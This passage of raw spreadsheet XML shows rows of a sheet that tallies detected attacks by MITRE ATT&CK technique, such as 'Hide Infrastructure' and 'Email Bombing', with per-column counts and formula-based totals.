      <c r="BC76" s="292">
        <v>2</v>
      </c>
      <c r="BD76" s="322">
        <v>2</v>
      </c>
      <c r="BE76" s="322" t="str">
        <f t="shared" si="23"/>
        <v>2 (2)</v>
      </c>
      <c r="BF76" s="12">
        <v>2</v>
      </c>
      <c r="BG76" s="13">
        <v>1</v>
      </c>
      <c r="BH76" s="394">
        <v>2</v>
      </c>
      <c r="BI76" s="292">
        <v>2</v>
      </c>
      <c r="BJ76" s="322">
        <v>1</v>
      </c>
      <c r="BK76" s="322" t="str">
        <f t="shared" si="24"/>
        <v>1 (2)</v>
      </c>
      <c r="BL76" s="12">
        <v>1</v>
      </c>
      <c r="BM76" s="13">
        <v>1</v>
      </c>
      <c r="BN76" s="394">
        <v>1</v>
      </c>
      <c r="BO76" s="292">
        <v>93</v>
      </c>
      <c r="BP76" s="322">
        <v>86</v>
      </c>
      <c r="BQ76" s="322" t="str">
        <f t="shared" si="25"/>
        <v>86 (93)</v>
      </c>
      <c r="BR76" s="12">
        <v>1</v>
      </c>
      <c r="BS76" s="12">
        <v>11</v>
      </c>
      <c r="BT76" s="13">
        <v>1</v>
      </c>
      <c r="BU76" s="394">
        <v>86</v>
      </c>
      <c r="BV76" s="292">
        <v>0</v>
      </c>
      <c r="BW76" s="322">
        <v>0</v>
      </c>
      <c r="BX76" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY76" s="12">
        <v>0</v>
      </c>
      <c r="BZ76" s="13">
        <v>0</v>
      </c>
      <c r="CA76" s="394">
        <v>0</v>
      </c>
      <c r="CB76" s="292">
        <v>3</v>
      </c>
      <c r="CC76" s="322">
        <v>3</v>
      </c>
      <c r="CD76" s="322" t="str">
        <f t="shared" si="27"/>
        <v>3 (3)</v>
      </c>
      <c r="CE76" s="12">
        <v>0</v>
      </c>
      <c r="CF76" s="12">
        <v>1</v>
      </c>
      <c r="CG76" s="13">
        <v>1</v>
      </c>
      <c r="CH76" s="394">
        <v>3</v>
      </c>
    </row>
    <row r="77" spans="1:98" ht="15" customHeight="1">
      <c r="A77" s="4">
        <f t="shared" si="28"/>
        <v>75</v>
      </c>
      <c r="B77" s="4" t="str">
        <f>IFERROR(VLOOKUP(A77,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1665</v>
      </c>
      <c r="C77" s="4" t="str">
        <f>IFERROR(VLOOKUP(B77,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hide Infrastructure</v>
      </c>
      <c r="D77" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B77)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E77" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B77,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F77" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (12)</v>
      </c>
      <c r="G77" s="292">
        <v>0</v>
      </c>
      <c r="H77" s="322">
        <v>0</v>
      </c>
      <c r="I77" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J77" s="12">
        <v>0</v>
      </c>
      <c r="K77" s="13">
        <v>0</v>
      </c>
      <c r="L77" s="394">
        <v>0</v>
      </c>
      <c r="M77" s="322">
        <v>0</v>
      </c>
      <c r="N77" s="322">
        <v>0</v>
      </c>
      <c r="O77" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P77" s="12">
        <v>0</v>
      </c>
      <c r="Q77" s="13">
        <v>0</v>
      </c>
      <c r="R77" s="394">
        <v>0</v>
      </c>
      <c r="S77" s="409">
        <v>0</v>
      </c>
      <c r="T77" s="4">
        <v>0</v>
      </c>
      <c r="U77" s="322" t="str">
        <f t="shared" si="17"/>
        <v>0 (0)</v>
      </c>
      <c r="V77" s="4">
        <v>0</v>
      </c>
      <c r="W77" s="13">
        <v>0</v>
      </c>
      <c r="X77" s="394">
        <v>0</v>
      </c>
      <c r="Y77" s="392">
        <v>264</v>
      </c>
      <c r="Z77" s="392">
        <v>6</v>
      </c>
      <c r="AA77" s="322" t="str">
        <f t="shared" si="18"/>
        <v>6 (264)</v>
      </c>
      <c r="AB77" s="392">
        <v>1</v>
      </c>
      <c r="AC77" s="16">
        <v>1</v>
      </c>
      <c r="AD77" s="394">
        <v>6</v>
      </c>
      <c r="AE77" s="392">
        <v>0</v>
      </c>
      <c r="AF77" s="392">
        <v>0</v>
      </c>
      <c r="AG77" s="322" t="str">
        <f t="shared" si="19"/>
        <v>0 (0)</v>
      </c>
      <c r="AH77" s="392">
        <v>0</v>
      </c>
      <c r="AI77" s="16">
        <v>0</v>
      </c>
      <c r="AJ77" s="394">
        <v>0</v>
      </c>
      <c r="AK77" s="392">
        <v>264</v>
      </c>
      <c r="AL77" s="392">
        <v>6</v>
      </c>
      <c r="AM77" s="322" t="str">
        <f t="shared" si="20"/>
        <v>6 (264)</v>
      </c>
      <c r="AN77" s="392">
        <v>1</v>
      </c>
      <c r="AO77" s="16">
        <v>1</v>
      </c>
      <c r="AP77" s="394">
        <v>6</v>
      </c>
      <c r="AQ77" s="292">
        <v>0</v>
      </c>
      <c r="AR77" s="322">
        <v>0</v>
      </c>
      <c r="AS77" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT77" s="12">
        <v>0</v>
      </c>
      <c r="AU77" s="13">
        <v>0</v>
      </c>
      <c r="AV77" s="394">
        <v>0</v>
      </c>
      <c r="AW77" s="392">
        <v>0</v>
      </c>
      <c r="AX77" s="392">
        <v>0</v>
      </c>
      <c r="AY77" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ77" s="4">
        <v>0</v>
      </c>
      <c r="BA77" s="16">
        <v>0</v>
      </c>
      <c r="BB77" s="394">
        <v>0</v>
      </c>
      <c r="BC77" s="292">
        <v>0</v>
      </c>
      <c r="BD77" s="322">
        <v>0</v>
      </c>
      <c r="BE77" s="322" t="str">
        <f t="shared" si="23"/>
        <v>0 (0)</v>
      </c>
      <c r="BF77" s="12">
        <v>0</v>
      </c>
      <c r="BG77" s="13">
        <v>0</v>
      </c>
      <c r="BH77" s="394">
        <v>0</v>
      </c>
      <c r="BI77" s="292">
        <v>6</v>
      </c>
      <c r="BJ77" s="322">
        <v>2</v>
      </c>
      <c r="BK77" s="322" t="str">
        <f t="shared" si="24"/>
        <v>2 (6)</v>
      </c>
      <c r="BL77" s="12">
        <v>1</v>
      </c>
      <c r="BM77" s="13">
        <v>1</v>
      </c>
      <c r="BN77" s="394">
        <v>2</v>
      </c>
      <c r="BO77" s="292">
        <v>16</v>
      </c>
      <c r="BP77" s="322">
        <v>12</v>
      </c>
      <c r="BQ77" s="322" t="str">
        <f t="shared" si="25"/>
        <v>12 (16)</v>
      </c>
      <c r="BR77" s="12">
        <v>1</v>
      </c>
      <c r="BS77" s="12">
        <v>5</v>
      </c>
      <c r="BT77" s="13">
        <v>1</v>
      </c>
      <c r="BU77" s="394">
        <v>10</v>
      </c>
      <c r="BV77" s="292">
        <v>0</v>
      </c>
      <c r="BW77" s="322">
        <v>0</v>
      </c>
      <c r="BX77" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY77" s="12">
        <v>0</v>
      </c>
      <c r="BZ77" s="13">
        <v>0</v>
      </c>
      <c r="CA77" s="394">
        <v>0</v>
      </c>
      <c r="CB77" s="292">
        <v>18</v>
      </c>
      <c r="CC77" s="322">
        <v>6</v>
      </c>
      <c r="CD77" s="322" t="str">
        <f t="shared" si="27"/>
        <v>6 (18)</v>
      </c>
      <c r="CE77" s="12">
        <v>0</v>
      </c>
      <c r="CF77" s="12">
        <v>1</v>
      </c>
      <c r="CG77" s="13">
        <v>1</v>
      </c>
      <c r="CH77" s="394">
        <v>6</v>
      </c>
    </row>
    <row r="78" spans="1:98" ht="15" customHeight="1">
      <c r="A78" s="4">
        <f t="shared" si="28"/>
        <v>76</v>
      </c>
      <c r="B78" s="4" t="str">
        <f>IFERROR(VLOOKUP(A78,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1667</v>
      </c>
      <c r="C78" s="493" t="str">
        <f>IFERROR(VLOOKUP(B78,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Bombing</v>
      </c>
      <c r="D78" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B78)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>100</v>
      </c>
      <c r="F78" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (100)</v>
      </c>
      <c r="G78" s="292">
        <v>0</v>
      </c>
      <c r="H78" s="322">
        <v>0</v>
      </c>
      <c r="I78" s="322" t="str">
        <f t="shared" si="15"/>
        <v>0 (0)</v>
      </c>
      <c r="J78" s="12">
        <v>0</v>
      </c>
      <c r="K78" s="13">
        <v>0</v>
      </c>
      <c r="L78" s="394">
        <v>0</v>
      </c>
      <c r="M78" s="322">
        <v>0</v>
      </c>
      <c r="N78" s="322">
        <v>0</v>
      </c>
      <c r="O78" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P78" s="12">
        <v>0</v>
      </c>
      <c r="Q78" s="13">
        <v>0</v>
      </c>
      <c r="R78" s="394">
        <v>0</v>
      </c>
      <c r="S78" s="409">
        <v>0</v>
      </c>
      <c r="T78" s="4">
        <v>0</v>
      </c>
      <c r="U78" s="322" t="str">
        <f t="shared" si="17"/>
        <v>0 (0)</v>
      </c>
      <c r="V78" s="4">
        <v>0</v>
      </c>
      <c r="W78" s="13">
        <v>0</v>
      </c>
      <c r="X78" s="394">
        <v>0</v>
      </c>
      <c r="Y78" s="392">
        <v>0</v>
      </c>
      <c r="Z78" s="392">
        <v>0</v>
      </c>
      <c r="AA78" s="322" t="str">
        <f t="shared" si="18"/>
        <v>0 (0)</v>
      </c>
      <c r="AB78" s="392">
        <v>0</v>
      </c>
      <c r="AC78" s="16">
        <v>0</v>
      </c>
      <c r="AD78" s="394">
        <v>0</v>
      </c>
      <c r="AE78" s="392">
        <v>0</v>
      </c>
      <c r="AF78" s="392">
        <v>0</v>
      </c>
      <c r="AG78" s="322" t="str">
        <f t="shared" si="19"/>
        <v>0 (0)</v>
      </c>
      <c r="AH78" s="392">
        <v>0</v>
      </c>
      <c r="AI78" s="16">
        <v>0</v>
      </c>
      <c r="AJ78" s="394">
        <v>0</v>
      </c>
      <c r="AK78" s="392">
        <v>0</v>
      </c>
      <c r="AL78" s="392">
        <v>0</v>
      </c>
      <c r="AM78" s="322" t="str">
        <f t="shared" si="20"/>
        <v>0 (0)</v>
      </c>
      <c r="AN78" s="392">
        <v>0</v>
      </c>
      <c r="AO78" s="16">
        <v>0</v>
      </c>
      <c r="AP78" s="394">
        <v>0</v>
      </c>
      <c r="AQ78" s="292">
        <v>0</v>
      </c>
      <c r="AR78" s="322">
        <v>0</v>
      </c>
      <c r="AS78" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT78" s="12">
        <v>0</v>
      </c>
      <c r="AU78" s="13">
        <v>0</v>
      </c>
      <c r="AV78" s="394">
        <v>0</v>
      </c>
      <c r="AW78" s="392">
        <v>0</v>
      </c>
      <c r="AX78" s="392">
        <v>0</v>
      </c>
      <c r="AY78" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ78" s="4">
        <v>0</v>
      </c>
      <c r="BA78" s="16">
        <v>0</v>
      </c>
      <c r="BB78" s="394">
        <v>0</v>
      </c>
      <c r="BC78" s="292">
        <v>0</v>
      </c>
      <c r="BD78" s="322">
        <v>0</v>
      </c>
      <c r="BE78" s="322" t="str">
        <f t="shared" si="23"/>
        <v>0 (0)</v>
      </c>
      <c r="BF78" s="12">
        <v>0</v>
      </c>
      <c r="BG78" s="13">
        <v>0</v>
      </c>
      <c r="BH78" s="394">
        <v>0</v>
      </c>
      <c r="BI78" s="292">
        <v>0</v>
      </c>
      <c r="BJ78" s="322">
        <v>0</v>
      </c>
      <c r="BK78" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL78" s="12">
        <v>0</v>
      </c>
      <c r="BM78" s="13">
        <v>0</v>
      </c>
      <c r="BN78" s="394">
        <v>0</v>
      </c>
      <c r="BO78" s="292">
        <v>0</v>
      </c>
      <c r="BP78" s="322">
        <v>0</v>
      </c>
      <c r="BQ78" s="322" t="str">
        <f t="shared" si="25"/>
        <v>0 (0)</v>
      </c>
      <c r="BR78" s="12">
        <v>0</v>
      </c>
      <c r="BS78" s="12">
        <v>0</v>
      </c>
      <c r="BT78" s="13">
        <v>0</v>
      </c>
      <c r="BU78" s="394">
        <v>0</v>
      </c>
      <c r="BV78" s="292">
        <v>0</v>
      </c>
      <c r="BW78" s="322">
        <v>0</v>
      </c>
      <c r="BX78" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY78" s="12">
        <v>0</v>
      </c>
      <c r="BZ78" s="13">
        <v>0</v>
      </c>
      <c r="CA78" s="394">
        <v>0</v>
      </c>
      <c r="CB78" s="292">
        <v>0</v>
      </c>
      <c r="CC78" s="322">
        <v>0</v>
      </c>
      <c r="CD78" s="322" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE78" s="12">
        <v>0</v>
      </c>
      <c r="CF78" s="12">
        <v>0</v>
      </c>
      <c r="CG78" s="13">
        <v>0</v>
      </c>
      <c r="CH78" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:98" s="4" customFormat="1" ht="15" customHeight="1">
      <c r="A79" s="660" t="s">
        <v>176</v>
      </c>
      <c r="B79" s="661"/>
      <c r="C79" s="662"/>
      <c r="D79" s="11">
        <f>SUM(D3:D78)</f>
        <v>110</v>
      </c>
      <c r="E79" s="11">
        <f>SUM(E3:E78)</f>
        <v>3573695</v>
      </c>
      <c r="F79" s="580" t="str">
        <f>D79&amp;" ("&amp;E79&amp;")"</f>
        <v>110 (3573695)</v>
      </c>
      <c r="G79" s="289">
        <f>SUM(G3:G78)</f>
        <v>362</v>
      </c>
      <c r="H79" s="581">
        <f>SUM(H3:H78)</f>
        <v>83</v>
      </c>
      <c r="I79" s="581" t="str">
        <f t="shared" ref="I79" si="30">H79 &amp; " (" &amp; G79 &amp; ")"</f>
        <v>83 (362)</v>
      </c>
      <c r="J79" s="11">
        <f>SUM(J3:J78)</f>
        <v>11</v>
      </c>
      <c r="K79" s="14">
        <f>SUMPRODUCT($D3:$D$78,K3:K78)/$D$79</f>
        <v>8.1818181818181818E-2</v>
      </c>
      <c r="L79" s="395">
        <f>SUM(L$3:L$78)</f>
        <v>82</v>
      </c>
      <c r="M79" s="581">
        <f>SUM(M3:M78)</f>
        <v>7237</v>
      </c>
      <c r="N79" s="581">
        <f>SUM(N3:N78)</f>
        <v>1223</v>
      </c>
      <c r="O79" s="581" t="str">
        <f t="shared" ref="O79" si="31">N79 &amp; " (" &amp; M79 &amp; ")"</f>
        <v>1223 (7237)</v>
      </c>
      <c r="P79" s="11">
        <f>SUM(P3:P78)</f>
        <v>147</v>
      </c>
      <c r="Q79" s="14">
        <f>SUMPRODUCT($D3:$D$78,Q3:Q78)/$D$79</f>
        <v>0.33636363636363636</v>
      </c>
      <c r="R79" s="290">
        <f>SUM(R$3:R$78)</f>
        <v>1046</v>
      </c>
      <c r="S79" s="289">
        <f>SUM(S3:S78)</f>
        <v>7599</v>
      </c>
      <c r="T79" s="581">
        <f>SUM(T3:T78)</f>
        <v>1306</v>
      </c>
      <c r="U79" s="581" t="str">
        <f t="shared" ref="U79" si="32">T79 &amp; " (" &amp; S79 &amp; ")"</f>
        <v>1306 (7599)</v>
      </c>
      <c r="V79" s="11">
        <f>SUM(V3:V78)</f>
        <v>158</v>
      </c>
      <c r="W79" s="14">
        <f>SUMPRODUCT($D3:$D$78,W3:W78)/$D$79</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="X79" s="395">
        <f>SUM(X$3:X$78)</f>
        <v>1073</v>
      </c>
      <c r="Y79" s="581">
        <f>SUM(Y3:Y78)</f>
        <v>943674</v>
      </c>
      <c r="Z79" s="581">
        <f>SUM(Z3:Z78)</f>
        <v>200430</v>
      </c>
      <c r="AA79" s="581" t="str">
        <f t="shared" ref="AA79" si="33">Z79 &amp; " (" &amp; Y79 &amp; ")"</f>
        <v>200430 (943674)</v>
      </c>
      <c r="AB79" s="11">
        <f>SUM(AB3:AB78)</f>
        <v>302</v>
      </c>
      <c r="AC79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AC3:AC78)/$D$79</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="AD79" s="290">
        <f>SUM(AD$3:AD$78)</f>
        <v>198202</v>
      </c>
      <c r="AE79" s="289">
        <f>SUM(AE3:AE78)</f>
        <v>21477</v>
      </c>
      <c r="AF79" s="581">
        <f>SUM(AF3:AF78)</f>
        <v>3309</v>
      </c>
      <c r="AG79" s="581" t="str">
        <f t="shared" ref="AG79" si="34">AF79 &amp; " (" &amp; AE79 &amp; ")"</f>
        <v>3309 (21477)</v>
      </c>
      <c r="AH79" s="11">
        <f>SUM(AH3:AH78)</f>
        <v>386</v>
      </c>
      <c r="AI79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AI3:AI78)/$D$79</f>
        <v>0.42727272727272725</v>
      </c>
      <c r="AJ79" s="395">
        <f>SUM(AJ$3:AJ$78)</f>
        <v>2271</v>
      </c>
      <c r="AK79" s="581">
        <f>SUM(AK3:AK78)</f>
        <v>965082</v>
      </c>
      <c r="AL79" s="581">
        <f>SUM(AL3:AL78)</f>
        <v>203672</v>
      </c>
      <c r="AM79" s="581" t="str">
        <f t="shared" ref="AM79" si="35">AL79 &amp; " (" &amp; AK79 &amp; ")"</f>
        <v>203672 (965082)</v>
      </c>
      <c r="AN79" s="11">
        <f>SUM(AN3:AN78)</f>
        <v>685</v>
      </c>
      <c r="AO79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AO3:AO78)/$D$79</f>
        <v>0.74545454545454548</v>
      </c>
      <c r="AP79" s="290">
        <f>SUM(AP$3:AP$78)</f>
        <v>198497</v>
      </c>
      <c r="AQ79" s="289">
        <f>SUM(AQ3:AQ78)</f>
        <v>16</v>
      </c>
      <c r="AR79" s="581">
        <f>SUM(AR3:AR78)</f>
        <v>2</v>
      </c>
      <c r="AS79" s="581" t="str">
        <f t="shared" ref="AS79" si="36">AR79 &amp; " (" &amp; AQ79 &amp; ")"</f>
        <v>2 (16)</v>
      </c>
      <c r="AT79" s="11">
        <f>SUM(AT3:AT78)</f>
        <v>2</v>
      </c>
      <c r="AU79" s="14">
        <f>SUMPRODUCT($D3:$D$78,AU3:AU78)/$D$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="AV79" s="395">
        <f>SUM(AV$3:AV$78)</f>
        <v>1</v>
      </c>
      <c r="AW79" s="581">
        <f>SUM(AW3:AW78)</f>
        <v>2771</v>
      </c>
      <c r="AX79" s="581">
        <f>SUM(AX3:AX78)</f>
        <v>1702</v>
      </c>
      <c r="AY79" s="581" t="str">
        <f t="shared" ref="AY79" si="37">AX79 &amp; " (" &amp; AW79 &amp; ")"</f>
        <v>1702 (2771)</v>
      </c>
      <c r="AZ79" s="11">
        <f>SUM(AZ3:AZ78)</f>
        <v>90</v>
      </c>
      <c r="BA79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BA3:BA78)/$D$79</f>
        <v>0.20909090909090908</v>
      </c>
      <c r="BB79" s="290">
        <f>SUM(BB$3:BB$78)</f>
        <v>1356</v>
      </c>
      <c r="BC79" s="289">
        <f>SUM(BC3:BC78)</f>
        <v>10354</v>
      </c>
      <c r="BD79" s="581">
        <f>SUM(BD3:BD78)</f>
        <v>3006</v>
      </c>
      <c r="BE79" s="581" t="str">
        <f t="shared" ref="BE79" si="38">BD79 &amp; " (" &amp; BC79 &amp; ")"</f>
        <v>3006 (10354)</v>
      </c>
      <c r="BF79" s="11">
        <f>SUM(BF3:BF78)</f>
        <v>246</v>
      </c>
      <c r="BG79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BG3:BG78)/$D$79</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="BH79" s="395">
        <f>SUM(BH$3:BH$78)</f>
        <v>2054</v>
      </c>
      <c r="BI79" s="289">
        <f>SUM(BI3:BI78)</f>
        <v>456</v>
      </c>
      <c r="BJ79" s="581">
        <f>SUM(BJ3:BJ78)</f>
        <v>345</v>
      </c>
      <c r="BK79" s="581" t="str">
        <f t="shared" ref="BK79" si="39">BJ79 &amp; " (" &amp; BI79 &amp; ")"</f>
        <v>345 (456)</v>
      </c>
      <c r="BL79" s="11">
        <f>SUM(BL3:BL78)</f>
        <v>97</v>
      </c>
      <c r="BM79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BM3:BM78)/$D$79</f>
        <v>0.41212121212121217</v>
      </c>
      <c r="BN79" s="290">
        <f>SUM(BN$3:BN$78)</f>
        <v>282</v>
      </c>
      <c r="BO79" s="289">
        <f>SUM(BO3:BO78)</f>
        <v>354219</v>
      </c>
      <c r="BP79" s="581">
        <f>SUM(BP3:BP78)</f>
        <v>343171</v>
      </c>
      <c r="BQ79" s="581" t="str">
        <f t="shared" ref="BQ79" si="40">BP79 &amp; " (" &amp; BO79 &amp; ")"</f>
        <v>343171 (354219)</v>
      </c>
      <c r="BR79" s="11">
        <f>SUM(BR3:BR78)</f>
        <v>97</v>
      </c>
      <c r="BS79" s="11">
        <f>SUM(BS3:BS78)</f>
        <v>241</v>
      </c>
      <c r="BT79" s="472">
        <f>SUMPRODUCT($D3:$D$78,BT3:BT78)/$D$79</f>
        <v>0.86666666666666659</v>
      </c>
      <c r="BU79" s="580">
        <f>SUM(BU3:BU78)</f>
        <v>342879</v>
      </c>
      <c r="BV79" s="289">
        <f>SUM(BV3:BV78)</f>
        <v>19771</v>
      </c>
      <c r="BW79" s="581">
        <f>SUM(BW3:BW78)</f>
        <v>19761</v>
      </c>
      <c r="BX79" s="581" t="str">
        <f t="shared" ref="BX79" si="41">BW79 &amp; " (" &amp; BV79 &amp; ")"</f>
        <v>19761 (19771)</v>
      </c>
      <c r="BY79" s="11">
        <f>SUM(BY3:BY78)</f>
        <v>49</v>
      </c>
      <c r="BZ79" s="14">
        <f>SUMPRODUCT($D3:$D$78,BZ3:BZ78)/$D$79</f>
        <v>0.17272727272727273</v>
      </c>
      <c r="CA79" s="395">
        <f>SUM(CA$3:CA$78)</f>
        <v>19751</v>
      </c>
      <c r="CB79" s="581">
        <f>SUM(CB3:CB78)</f>
        <v>3992941</v>
      </c>
      <c r="CC79" s="581">
        <f>SUM(CC3:CC78)</f>
        <v>2488061</v>
      </c>
      <c r="CD79" s="581" t="str">
        <f t="shared" ref="CD79" si="42">CC79 &amp; " (" &amp; CB79 &amp; ")"</f>
        <v>2488061 (3992941)</v>
      </c>
      <c r="CE79" s="11">
        <f>SUM(CE3:CE78)</f>
        <v>0</v>
      </c>
      <c r="CF79" s="11">
        <f>SUM(CF3:CF78)</f>
        <v>49</v>
      </c>
      <c r="CG79" s="14">
        <f>SUMPRODUCT($D3:$D$78,CG3:CG78)/$D$79</f>
        <v>0.5</v>
      </c>
      <c r="CH79" s="514">
        <f>SUM(CH3:CH78)</f>
        <v>2488060</v>
      </c>
      <c r="CI79" s="3"/>
      <c r="CJ79" s="3"/>
      <c r="CK79" s="3"/>
      <c r="CL79" s="3"/>
      <c r="CM79" s="3"/>
      <c r="CN79" s="3"/>
      <c r="CO79" s="3"/>
      <c r="CP79" s="3"/>
      <c r="CQ79" s="3"/>
      <c r="CR79" s="3"/>
      <c r="CS79" s="3"/>
      <c r="CT79" s="3"/>
    </row>
    <row r="80" spans="1:98" s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A80" s="15"/>
      <c r="B80" s="3"/>
      <c r="C80" s="3"/>
      <c r="D80" s="1"/>
      <c r="E80" s="1"/>
      <c r="F80" s="3"/>
      <c r="G80" s="3"/>
      <c r="H80" s="3"/>
      <c r="I80" s="3"/>
      <c r="J80" s="3"/>
      <c r="K80" s="738"/>
      <c r="L80" s="738"/>
      <c r="M80" s="738"/>
      <c r="N80" s="738"/>
      <c r="O80" s="738"/>
      <c r="P80" s="738"/>
      <c r="Q80" s="738"/>
      <c r="R80" s="1"/>
      <c r="S80" s="1"/>
      <c r="T80" s="1"/>
      <c r="U80" s="1"/>
      <c r="V80" s="1"/>
      <c r="W80" s="1"/>
      <c r="X80" s="1"/>
      <c r="Y80" s="1"/>
      <c r="Z80" s="1"/>
      <c r="AA80" s="1"/>
      <c r="AB80" s="1"/>
      <c r="AC80" s="1"/>
      <c r="AD80" s="1"/>
      <c r="AE80" s="3"/>
      <c r="AF80" s="3"/>
      <c r="AG80" s="3"/>
      <c r="AH80" s="3"/>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405"/>
      <c r="BJ80" s="406"/>
      <c r="BK80" s="406"/>
      <c r="BL80" s="406"/>
      <c r="BM80" s="406"/>
      <c r="BN80" s="406"/>
      <c r="BO80" s="406"/>
      <c r="BP80" s="406"/>
      <c r="BQ80" s="406"/>
      <c r="BR80" s="406"/>
      <c r="BS80" s="406"/>
      <c r="BT80" s="406"/>
      <c r="BU80" s="406"/>
      <c r="BV80" s="406"/>
      <c r="BW80" s="406"/>
      <c r="BX80" s="406"/>
      <c r="BY80" s="406"/>
      <c r="BZ80" s="406"/>
      <c r="CA80" s="406"/>
      <c r="CB80" s="406"/>
      <c r="CC80" s="406"/>
      <c r="CD80" s="406"/>
      <c r="CE80" s="406"/>
      <c r="CF80" s="406"/>
      <c r="CG80" s="406"/>
      <c r="CH80" s="406"/>
      <c r="CI80" s="1"/>
      <c r="CJ80" s="1"/>
      <c r="CK80" s="1"/>
      <c r="CL80" s="1"/>
      <c r="CM80" s="1"/>
      <c r="CN80" s="1"/>
      <c r="CO80" s="1"/>
      <c r="CP80" s="1"/>
      <c r="CQ80" s="1"/>
      <c r="CR80" s="1"/>
      <c r="CS80" s="1"/>
      <c r="CT80" s="1"/>
    </row>
    <row r="81" spans="1:98" s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A81" s="15"/>
      <c r="B81" s="3"/>
      <c r="C81" s="3"/>
      <c r="D81" s="1"/>
      <c r="E81" s="1"/>
      <c r="F81" s="3"/>
      <c r="G81" s="3"/>
      <c r="H81" s="670"/>
      <c r="I81" s="670"/>
      <c r="J81" s="670"/>
      <c r="K81" s="670"/>
      <c r="L81" s="670"/>
      <c r="M81" s="670"/>
      <c r="N81" s="670"/>
      <c r="O81" s="670"/>
      <c r="P81" s="670"/>
      <c r="Q81" s="670"/>
      <c r="R81" s="1"/>
      <c r="S81" s="1"/>
      <c r="T81" s="1"/>
      <c r="U81" s="1"/>
      <c r="V81" s="1"/>
      <c r="W81" s="1"/>
      <c r="X81" s="1"/>
      <c r="Y81" s="1"/>
      <c r="Z81" s="1"/>
      <c r="AA81" s="1"/>
      <c r="AB81" s="1"/>
      <c r="AC81" s="1"/>
      <c r="AD81" s="1"/>
      <c r="AE81" s="3"/>
      <c r="AF81" s="3"/>
      <c r="AG81" s="3"/>
      <c r="AH81" s="3"/>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335"/>
      <c r="BM81" s="1"/>
      <c r="BN81" s="1"/>
      <c r="BO81" s="1"/>
      <c r="BP81" s="1"/>
      <c r="BQ81" s="1"/>
      <c r="BR81" s="335"/>
      <c r="BS81" s="335"/>
      <c r="BT81" s="335"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A82" s="15"/>
      <c r="B82" s="3"/>
      <c r="C82" s="3"/>
      <c r="D82" s="1"/>
      <c r="E82" s="1"/>
      <c r="F82" s="3"/>
      <c r="G82" s="3"/>
      <c r="H82" s="3"/>
      <c r="I82" s="3"/>
      <c r="J82" s="3"/>
      <c r="K82" s="1"/>
      <c r="L82" s="1"/>
      <c r="M82" s="1"/>
      <c r="N82" s="1"/>
      <c r="O82" s="1"/>
      <c r="P82" s="1"/>
      <c r="Q82" s="1"/>
      <c r="R82" s="1"/>
      <c r="S82" s="1"/>
      <c r="T82" s="1"/>
      <c r="U82" s="1"/>
      <c r="V82" s="1"/>
      <c r="W82" s="1"/>
      <c r="X82" s="1"/>
      <c r="Y82" s="1"/>
      <c r="Z82" s="1"/>
      <c r="AA82" s="1"/>
      <c r="AB82" s="1"/>
      <c r="AC82" s="1"/>
      <c r="AD82" s="1"/>
      <c r="AE82" s="3"/>
      <c r="AF82" s="3"/>
      <c r="AG82" s="3"/>
      <c r="AH82" s="3"/>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335"/>
      <c r="BM82" s="1"/>
      <c r="BN82" s="1"/>
      <c r="BO82" s="1"/>
      <c r="BP82" s="1"/>
      <c r="BQ82" s="1"/>
      <c r="BR82" s="335"/>
      <c r="BS82" s="335"/>
      <c r="BT82" s="335"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A83" s="15"/>
      <c r="B83" s="3"/>
      <c r="C83" s="3"/>
      <c r="D83" s="1"/>
      <c r="E83" s="1"/>
